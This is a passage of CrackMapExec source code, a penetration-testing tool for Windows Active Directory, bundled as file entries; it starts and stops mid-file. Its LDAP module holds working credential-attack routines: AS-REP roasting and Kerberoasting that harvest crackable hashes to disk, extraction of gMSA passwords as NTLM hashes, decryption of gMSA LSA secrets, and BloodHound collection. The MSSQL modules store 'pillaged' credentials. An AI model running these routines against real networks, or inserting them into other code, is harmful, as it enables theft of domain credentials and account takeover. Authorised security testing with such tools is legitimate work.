% (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)\n attributes = [\n \"sAMAccountName\",\n \"pwdLastSet\",\n \"MemberOf\",\n \"userAccountControl\",\n \"lastLogon\",\n ]\n resp = self.search(search_filter, attributes, 0)\n if resp == []:\n self.logger.highlight(\"No entries found!\")\n elif resp:\n answers = []\n self.logger.display(f\"Total of records returned {len(resp):d}\")\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = \"\"\n memberOf = \"\"\n pwdLastSet = \"\"\n userAccountControl = 0\n lastLogon = \"N/A\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n mustCommit = True\n elif str(attribute[\"type\"]) == \"userAccountControl\":\n userAccountControl = \"0x%x\" % int(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"memberOf\":\n memberOf = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"pwdLastSet\":\n if str(attribute[\"vals\"][0]) == \"0\":\n pwdLastSet = \"\"\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"lastLogon\":\n if str(attribute[\"vals\"][0]) == \"0\":\n lastLogon = \"\"\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n if mustCommit is True:\n answers.append(\n [\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n userAccountControl,\n ]\n )\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.debug(f\"Skipping item, cannot process due to error {e}\")\n pass\n if len(answers) > 0:\n for user in answers:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])\n self.logger.highlight(f\"{hash_TGT}\")\n with open(self.args.asreproast, \"a+\") as hash_asreproast:\n hash_asreproast.write(hash_TGT + \"\\n\")\n return True\n else:\n self.logger.highlight(\"No entries found!\")\n return\n else:\n self.logger.fail(\"Error with the LDAP account used\")\n\n def kerberoasting(self):\n # Building the search filter\n searchFilter = \"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)\" \"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))\"\n attributes = [\n \"servicePrincipalName\",\n \"sAMAccountName\",\n \"pwdLastSet\",\n \"MemberOf\",\n \"userAccountControl\",\n \"lastLogon\",\n ]\n resp = self.search(searchFilter, attributes, 0)\n if not resp:\n self.logger.highlight(\"No entries found!\")\n elif resp:\n answers = []\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = \"\"\n memberOf = \"\"\n SPNs = []\n pwdLastSet = \"\"\n userAccountControl = 0\n lastLogon = \"N/A\"\n delegation = \"\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n mustCommit = True\n elif str(attribute[\"type\"]) == \"userAccountControl\":\n userAccountControl = str(attribute[\"vals\"][0])\n if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:\n delegation = \"unconstrained\"\n elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:\n delegation = \"constrained\"\n elif str(attribute[\"type\"]) == \"memberOf\":\n memberOf = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"pwdLastSet\":\n if str(attribute[\"vals\"][0]) == \"0\":\n pwdLastSet = \"\"\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"lastLogon\":\n if str(attribute[\"vals\"][0]) == \"0\":\n lastLogon = \"\"\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"servicePrincipalName\":\n for spn in attribute[\"vals\"]:\n SPNs.append(str(spn))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n self.logger.debug(f\"Bypassing disabled account {sAMAccountName} \")\n else:\n for spn in SPNs:\n answers.append(\n [\n spn,\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n delegation,\n ]\n )\n except Exception as e:\n cme_logger.error(f\"Skipping item, cannot process due to error {str(e)}\")\n pass\n\n if len(answers) > 0:\n self.logger.display(f\"Total of records returned {len(answers):d}\")\n TGT = KerberosAttacks(self).getTGT_kerberoasting()\n dejavue = []\n for (\n SPN,\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n delegation,\n ) in answers:\n if sAMAccountName not in dejavue:\n downLevelLogonName = self.targetDomain + \"\\\\\" + sAMAccountName\n\n try:\n principalName = Principal()\n principalName.type = constants.PrincipalNameType.NT_MS_PRINCIPAL.value\n principalName.components = [downLevelLogonName]\n\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(\n principalName,\n self.domain,\n self.kdcHost,\n TGT[\"KDC_REP\"],\n TGT[\"cipher\"],\n TGT[\"sessionKey\"],\n )\n r = KerberosAttacks(self).outputTGS(\n tgs,\n oldSessionKey,\n sessionKey,\n sAMAccountName,\n self.targetDomain + \"/\" + sAMAccountName,\n )\n self.logger.highlight(f\"sAMAccountName: {sAMAccountName} memberOf: {memberOf} pwdLastSet: {pwdLastSet} lastLogon:{lastLogon}\")\n self.logger.highlight(f\"{r}\")\n with open(self.args.kerberoasting, \"a+\") as hash_kerberoasting:\n hash_kerberoasting.write(r + \"\\n\")\n dejavue.append(sAMAccountName)\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n cme_logger.error(f\"Principal: {downLevelLogonName} - {e}\")\n return True\n else:\n self.logger.highlight(\"No entries found!\")\n return\n self.logger.fail(\"Error with the LDAP account used\")\n\n def trusted_for_delegation(self):\n # Building the search filter\n searchFilter = \"(userAccountControl:1.2.840.113556.1.4.803:=524288)\"\n attributes = [\n \"sAMAccountName\",\n \"pwdLastSet\",\n \"MemberOf\",\n \"userAccountControl\",\n \"lastLogon\",\n ]\n resp = self.search(searchFilter, attributes, 0)\n\n answers = []\n self.logger.debug(f\"Total of records returned {len(resp):d}\")\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = \"\"\n memberOf = \"\"\n pwdLastSet = \"\"\n userAccountControl = 0\n lastLogon = \"N/A\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n mustCommit = True\n elif str(attribute[\"type\"]) == \"userAccountControl\":\n userAccountControl = \"0x%x\" % int(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"memberOf\":\n memberOf = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"pwdLastSet\":\n if str(attribute[\"vals\"][0]) == \"0\":\n pwdLastSet = \"\"\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"lastLogon\":\n if str(attribute[\"vals\"][0]) == \"0\":\n lastLogon = \"\"\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n if mustCommit is True:\n answers.append(\n [\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n userAccountControl,\n ]\n )\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.debug(f\"Skipping item, cannot process due to error {e}\")\n pass\n if len(answers) > 0:\n self.logger.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.fail(\"No entries found!\")\n return\n\n def password_not_required(self):\n # Building the search filter\n searchFilter = \"(userAccountControl:1.2.840.113556.1.4.803:=32)\"\n try:\n self.logger.debug(f\"Search Filter={searchFilter}\")\n resp = self.ldapConnection.search(\n searchFilter=searchFilter,\n attributes=[\n \"sAMAccountName\",\n \"pwdLastSet\",\n \"MemberOf\",\n \"userAccountControl\",\n \"lastLogon\",\n ],\n sizeLimit=0,\n )\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find(\"sizeLimitExceeded\") >= 0:\n self.logger.debug(\"sizeLimitExceeded exception caught, giving up and processing the data received\")\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n answers = []\n self.logger.debug(f\"Total of records returned {len(resp):d}\")\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = \"\"\n memberOf = \"\"\n pwdLastSet = \"\"\n userAccountControl = 0\n status = \"enabled\"\n lastLogon = \"N/A\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n mustCommit = True\n elif str(attribute[\"type\"]) == \"userAccountControl\":\n if int(attribute[\"vals\"][0]) & 2:\n status = \"disabled\"\n userAccountControl = f\"0x{int(attribute['vals'][0]):x}\"\n elif str(attribute[\"type\"]) == \"memberOf\":\n memberOf = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"pwdLastSet\":\n if str(attribute[\"vals\"][0]) == \"0\":\n pwdLastSet = \"\"\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"lastLogon\":\n if str(attribute[\"vals\"][0]) == \"0\":\n lastLogon = \"\"\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n if mustCommit is True:\n answers.append(\n [\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n userAccountControl,\n status,\n ]\n )\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.debug(f\"Skipping item, cannot process due to error {str(e)}\")\n pass\n if len(answers) > 0:\n self.logger.debug(answers)\n for value in answers:\n self.logger.highlight(f\"User: {value[0]} Status: {value[5]}\")\n else:\n self.logger.fail(\"No entries found!\")\n return\n\n def admin_count(self):\n # Building the search filter\n searchFilter = \"(adminCount=1)\"\n attributes = [\n \"sAMAccountName\",\n \"pwdLastSet\",\n \"MemberOf\",\n \"userAccountControl\",\n \"lastLogon\",\n ]\n resp = self.search(searchFilter, attributes, 0)\n answers = []\n self.logger.debug(f\"Total of records returned {len(resp):d}\")\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = \"\"\n memberOf = \"\"\n pwdLastSet = \"\"\n userAccountControl = 0\n lastLogon = \"N/A\"\n try:\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n mustCommit = True\n elif str(attribute[\"type\"]) == \"userAccountControl\":\n userAccountControl = \"0x%x\" % int(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"memberOf\":\n memberOf = str(attribute[\"vals\"][0])\n elif str(attribute[\"type\"]) == \"pwdLastSet\":\n if str(attribute[\"vals\"][0]) == \"0\":\n pwdLastSet = \"\"\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n elif str(attribute[\"type\"]) == \"lastLogon\":\n if str(attribute[\"vals\"][0]) == \"0\":\n lastLogon = \"\"\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute[\"vals\"][0])))))\n if mustCommit is True:\n answers.append(\n [\n sAMAccountName,\n memberOf,\n pwdLastSet,\n lastLogon,\n userAccountControl,\n ]\n )\n except Exception as e:\n self.logger.debug(\"Exception:\", exc_info=True)\n self.logger.debug(f\"Skipping item, cannot process due to error {str(e)}\")\n pass\n if len(answers) > 0:\n self.logger.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.fail(\"No entries found!\")\n return\n\n def gmsa(self):\n self.logger.display(\"Getting GMSA Passwords\")\n search_filter = \"(objectClass=msDS-GroupManagedServiceAccount)\"\n gmsa_accounts = self.ldapConnection.search(\n searchFilter=search_filter,\n attributes=[\n \"sAMAccountName\",\n \"msDS-ManagedPassword\",\n \"msDS-GroupMSAMembership\",\n ],\n sizeLimit=0,\n searchBase=self.baseDN,\n )\n if gmsa_accounts:\n answers = []\n self.logger.debug(f\"Total of records returned {len(gmsa_accounts):d}\")\n\n for item in gmsa_accounts:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n sAMAccountName = \"\"\n passwd = \"\"\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n if str(attribute[\"type\"]) == \"msDS-ManagedPassword\":\n data = attribute[\"vals\"][0].asOctets()\n blob = MSDS_MANAGEDPASSWORD_BLOB()\n blob.fromString(data)\n currentPassword = blob[\"CurrentPassword\"][:-2]\n ntlm_hash = MD4.new()\n ntlm_hash.update(currentPassword)\n passwd = hexlify(ntlm_hash.digest()).decode(\"utf-8\")\n self.logger.highlight(f\"Account: {sAMAccountName:<20} NTLM: {passwd}\")\n return True\n\n def decipher_gmsa_name(self, domain_name=None, account_name=None):\n # https://aadinternals.com/post/gmsa/\n gmsa_account_name = (domain_name + account_name).upper()\n self.logger.debug(f\"GMSA name for {gmsa_account_name}\")\n bin_account_name = gmsa_account_name.encode(\"utf-16le\")\n bin_hash = hmac.new(bytes(\"\", \"latin-1\"), msg=bin_account_name, digestmod=hashlib.sha256).digest()\n hex_letters = \"0123456789abcdef\"\n str_hash = \"\"\n for b in bin_hash:\n str_hash += hex_letters[b & 0x0F]\n str_hash += hex_letters[b >> 0x04]\n self.logger.debug(f\"Hash2: {str_hash}\")\n return str_hash\n\n def gmsa_convert_id(self):\n if self.args.gmsa_convert_id:\n if len(self.args.gmsa_convert_id) != 64:\n self.logger.fail(\"Length of the gmsa id not correct :'(\")\n else:\n # getting the gmsa account\n search_filter = \"(objectClass=msDS-GroupManagedServiceAccount)\"\n gmsa_accounts = self.ldapConnection.search(\n searchFilter=search_filter,\n attributes=[\"sAMAccountName\"],\n sizeLimit=0,\n searchBase=self.baseDN,\n )\n if gmsa_accounts:\n answers = []\n self.logger.debug(f\"Total of records returned {len(gmsa_accounts):d}\")\n\n for item in gmsa_accounts:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n sAMAccountName = \"\"\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n if self.decipher_gmsa_name(self.domain.split(\".\")[0], sAMAccountName[:-1]) == self.args.gmsa_convert_id:\n self.logger.highlight(f\"Account: {sAMAccountName:<20} ID: {self.args.gmsa_convert_id}\")\n break\n else:\n self.logger.fail(\"No string provided :'(\")\n\n def gmsa_decrypt_lsa(self):\n if self.args.gmsa_decrypt_lsa:\n if \"_SC_GMSA_{84A78B8C\" in self.args.gmsa_decrypt_lsa:\n gmsa = self.args.gmsa_decrypt_lsa.split(\"_\")[4].split(\":\")\n gmsa_id = gmsa[0]\n gmsa_pass = gmsa[1]\n # getting the gmsa account\n search_filter = \"(objectClass=msDS-GroupManagedServiceAccount)\"\n gmsa_accounts = self.ldapConnection.search(\n searchFilter=search_filter,\n attributes=[\"sAMAccountName\"],\n sizeLimit=0,\n searchBase=self.baseDN,\n )\n if gmsa_accounts:\n answers = []\n self.logger.debug(f\"Total of records returned {len(gmsa_accounts):d}\")\n\n for item in gmsa_accounts:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n sAMAccountName = \"\"\n for attribute in item[\"attributes\"]:\n if str(attribute[\"type\"]) == \"sAMAccountName\":\n sAMAccountName = str(attribute[\"vals\"][0])\n if self.decipher_gmsa_name(self.domain.split(\".\")[0], sAMAccountName[:-1]) == gmsa_id:\n gmsa_id = sAMAccountName\n break\n # convert to ntlm\n data = bytes.fromhex(gmsa_pass)\n blob = MSDS_MANAGEDPASSWORD_BLOB()\n blob.fromString(data)\n currentPassword = blob[\"CurrentPassword\"][:-2]\n ntlm_hash = MD4.new()\n ntlm_hash.update(currentPassword)\n passwd = hexlify(ntlm_hash.digest()).decode(\"utf-8\")\n self.logger.highlight(f\"Account: {gmsa_id:<20} NTLM: {passwd}\")\n else:\n self.logger.fail(\"No string provided :'(\")\n\n def bloodhound(self):\n auth = ADAuthentication(\n username=self.username,\n password=self.password,\n domain=self.domain,\n lm_hash=self.nthash,\n nt_hash=self.nthash,\n aeskey=self.aesKey,\n kdc=self.kdcHost,\n auth_method=\"auto\",\n )\n ad = AD(\n auth=auth,\n domain=self.domain,\n nameserver=self.args.nameserver,\n dns_tcp=False,\n dns_timeout=3,\n )\n collect = resolve_collection_methods(\"Default\" if not self.args.collection else self.args.collection)\n if not collect:\n return\n self.logger.highlight(\"Resolved collection methods: \" + \", \".join(list(collect)))\n\n self.logger.debug(\"Using DNS to retrieve domain information\")\n ad.dns_resolve(domain=self.domain)\n\n if self.args.kerberos:\n self.logger.highlight(\"Using kerberos auth without ccache, getting TGT\")\n auth.get_tgt()\n if self.args.use_kcache:\n self.logger.highlight(\"Using kerberos auth from ccache\")\n\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H%M%S\") + \"_\"\n bloodhound = BloodHound(ad, self.hostname, self.host, self.args.port)\n bloodhound.connect()\n\n bloodhound.run(\n collect=collect,\n num_workers=10,\n disable_pooling=False,\n timestamp=timestamp,\n computerfile=None,\n cachefile=None,\n exclude_dcs=False,\n )\n\n self.logger.highlight(f\"Compressing output into {self.output_filename}bloodhound.zip\")\n list_of_files = os.listdir(os.getcwd())\n with ZipFile(self.output_filename + \"bloodhound.zip\", \"w\") as z:\n for each_file in list_of_files:\n if each_file.startswith(timestamp) and each_file.endswith(\"json\"):\n z.write(each_file)\n os.remove(each_file)\n" }, { "path": "cme/protocols/mssql/__init__.py", "content": "" }, { "path": "cme/protocols/mssql/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, func, Table, select, insert, update, delete\nfrom sqlalchemy.dialects.sqlite import Insert # used for upsert\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom sqlalchemy.exc import SAWarning\nimport warnings\nfrom cme.logger import cme_logger\n\n# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings\nwarnings.filterwarnings(\"ignore\", category=SAWarning)\n\n\nclass database:\n def __init__(self, db_engine):\n self.HostsTable = None\n self.UsersTable = None\n self.AdminRelationsTable = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"domain\" text,\n \"os\" text,\n \"instances\" integer\n )\"\"\"\n )\n # This table keeps track of which credential has admin access over which machine and vice-versa\n db_conn.execute(\n \"\"\"CREATE TABLE \"admin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n # type = hash, plaintext\n db_conn.execute(\n \"\"\"CREATE TABLE \"users\" (\n \"id\" integer PRIMARY KEY,\n \"credtype\" text,\n \"domain\" text,\n \"username\" text,\n \"password\" text,\n \"pillaged_from_hostid\" integer,\n FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n self.UsersTable = Table(\"users\", self.metadata, autoload_with=self.db_engine)\n self.AdminRelationsTable = Table(\"admin_relations\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n\n def add_host(self, ip, hostname, domain, os, instances):\n \"\"\"\n Check if this host has already been added to the database, if not, add it in.\n TODO: return inserted or updated row ids as a list\n \"\"\"\n cme_logger.debug(f\"{domain} {ip} {os} {instances}\")\n if not domain:\n domain = \"\"\n hosts = []\n\n q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)\n results = self.conn.execute(q).all()\n cme_logger.debug(f\"mssql add_host() - hosts returned: {results}\")\n\n host_data = {\n \"ip\": ip,\n \"hostname\": hostname,\n \"domain\": domain,\n \"os\": os,\n \"instances\": instances,\n }\n\n if not results:\n hosts = [host_data]\n else:\n for host in results:\n host_data = host._asdict()\n if ip is not None:\n host_data[\"ip\"] = ip\n if hostname is not None:\n host_data[\"hostname\"] = hostname\n if domain is not None:\n host_data[\"domain\"] = domain\n if os is not None:\n host_data[\"os\"] = os\n if instances is not None:\n host_data[\"instances\"] = instances\n if host_data not in hosts:\n hosts.append(host_data)\n\n cme_logger.debug(f\"Update Hosts: {hosts}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.HostsTable)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)\n self.conn.execute(q, hosts)\n\n def add_credential(self, credtype, domain, username, password, pillaged_from=None):\n \"\"\"\n Check if this credential has already been added to the database, if not add it in.\n \"\"\"\n user_rowid = None\n\n credential_data = {}\n if credtype is not None:\n credential_data[\"credtype\"] = credtype\n if domain is not None:\n credential_data[\"domain\"] = domain\n if username is not None:\n credential_data[\"username\"] = username\n if password is not None:\n credential_data[\"password\"] = password\n if pillaged_from is not None:\n credential_data[\"pillaged_from\"] = pillaged_from\n\n q = select(self.UsersTable).filter(\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n func.lower(self.UsersTable.c.credtype) == func.lower(credtype),\n )\n results = self.conn.execute(q).all()\n\n if not results:\n user_data = {\n \"domain\": domain,\n \"username\": username,\n \"password\": password,\n \"credtype\": credtype,\n \"pillaged_from_hostid\": pillaged_from,\n }\n q = insert(self.UsersTable).values(user_data) # .returning(self.UsersTable.c.id)\n self.conn.execute(q) # .first()\n else:\n for user in results:\n # might be able to just remove this if check, but leaving it in for now\n if not user[3] and not user[4] and not user[5]:\n q = update(self.UsersTable).values(credential_data) # .returning(self.UsersTable.c.id)\n results = self.conn.execute(q) # .first()\n # user_rowid = results.id\n\n cme_logger.debug(f\"add_credential(credtype={credtype}, domain={domain}, username={username}, password={password}, pillaged_from={pillaged_from})\")\n return user_rowid\n\n def remove_credentials(self, creds_id):\n \"\"\"\n Removes a credential ID from the database\n \"\"\"\n del_hosts = []\n for cred_id in creds_id:\n q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)\n del_hosts.append(q)\n self.conn.execute(q)\n\n def add_admin_user(self, credtype, domain, username, password, host, user_id=None):\n\n if user_id:\n q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)\n users = self.conn.execute(q).all()\n else:\n q = select(self.UsersTable).filter(\n self.UsersTable.c.credtype == credtype,\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n self.UsersTable.c.password == password,\n )\n users = self.conn.execute(q).all()\n cme_logger.debug(f\"Users: {users}\")\n\n like_term = func.lower(f\"%{host}%\")\n q = q.filter(self.HostsTable.c.ip.like(like_term))\n hosts = self.conn.execute(q).all()\n cme_logger.debug(f\"Hosts: {hosts}\")\n\n if users is not None and hosts is not None:\n for user, host in zip(users, hosts):\n user_id = user[0]\n host_id = host[0]\n link = {\"userid\": user_id, \"hostid\": host_id}\n\n q = select(self.AdminRelationsTable).filter(\n self.AdminRelationsTable.c.userid == user_id,\n self.AdminRelationsTable.c.hostid == host_id,\n )\n links = self.conn.execute(q).all()\n\n if not links:\n self.conn.execute(insert(self.AdminRelationsTable).values(link))\n\n def get_admin_relations(self, user_id=None, host_id=None):\n if user_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)\n else:\n q = select(self.AdminRelationsTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def remove_admin_relation(self, user_ids=None, host_ids=None):\n q = delete(self.AdminRelationsTable)\n if user_ids:\n for user_id in user_ids:\n q = q.filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_ids:\n for host_id in host_ids:\n q = q.filter(self.AdminRelationsTable.c.hostid == host_id)\n self.conn.execute(q)\n\n def is_credential_valid(self, credential_id):\n \"\"\"\n Check if this credential ID is valid.\n \"\"\"\n q = select(self.UsersTable).filter(\n self.UsersTable.c.id == credential_id,\n self.UsersTable.c.password is not None,\n )\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_credentials(self, filter_term=None, cred_type=None):\n \"\"\"\n Return credentials from the database.\n \"\"\"\n # if we're returning a single credential by ID\n if self.is_credential_valid(filter_term):\n q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)\n elif cred_type:\n q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))\n # otherwise return all credentials\n else:\n q = select(self.UsersTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def is_host_valid(self, host_id):\n \"\"\"\n Check if this host ID is valid.\n \"\"\"\n q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_hosts(self, filter_term=None, domain=None):\n \"\"\"\n Return hosts from the database.\n \"\"\"\n q = select(self.HostsTable)\n\n # if we're returning a single host by ID\n if self.is_host_valid(filter_term):\n q = q.filter(self.HostsTable.c.id == filter_term)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n # if we're filtering by domain controllers\n elif filter_term == \"dc\":\n q = q.filter(self.HostsTable.c.dc == True)\n if domain:\n q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))\n # if we're filtering by ip/hostname\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.HostsTable).filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))\n\n results = self.conn.execute(q).all()\n return results\n" }, { "path": "cme/protocols/mssql/db_navigator.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass navigator(DatabaseNavigator):\n def display_creds(self, creds):\n data = [[\"CredID\", \"Admin On\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n\n for cred in creds:\n links = self.db.get_admin_relations(user_id=cred[0])\n data.append(\n [\n cred[0], # cred_id\n str(len(links)) + \" Host(s)\",\n cred[1], # cred_type\n cred[2], # domain\n cred[3], # username\n cred[4], # password\n ]\n )\n print_table(data, title=\"Credentials\")\n\n def display_hosts(self, hosts):\n data = [[\"HostID\", \"Admins\", \"IP\", \"Hostname\", \"Domain\", \"OS\", \"DB Instances\"]]\n for host in hosts:\n links = self.db.get_admin_relations(host_id=host[0])\n data.append(\n [\n host[0],\n str(len(links)) + \" Cred(s)\",\n host[1],\n host[2],\n host[3],\n host[4],\n host[5],\n ]\n )\n print_table(data, title=\"Hosts\")\n\n def do_hosts(self, line):\n filter_term = line.strip()\n\n if filter_term == \"\":\n hosts = self.db.get_hosts()\n self.display_hosts(hosts)\n else:\n hosts = self.db.get_hosts(filter_term=filter_term)\n\n if len(hosts) > 1:\n self.display_hosts(hosts)\n elif len(hosts) == 1:\n data = [[\"HostID\", \"IP\", \"Hostname\", \"Domain\", \"OS\"]]\n host_id_list = []\n\n for host in hosts:\n host_id_list.append(host[0])\n data.append([host[0], host[1], host[2], host[3], host[4]])\n\n print_table(data, title=\"Host(s)\")\n\n data = [[\"CredID\", \"CredType\", \"Domain\", \"UserName\", \"Password\"]]\n for host_id in 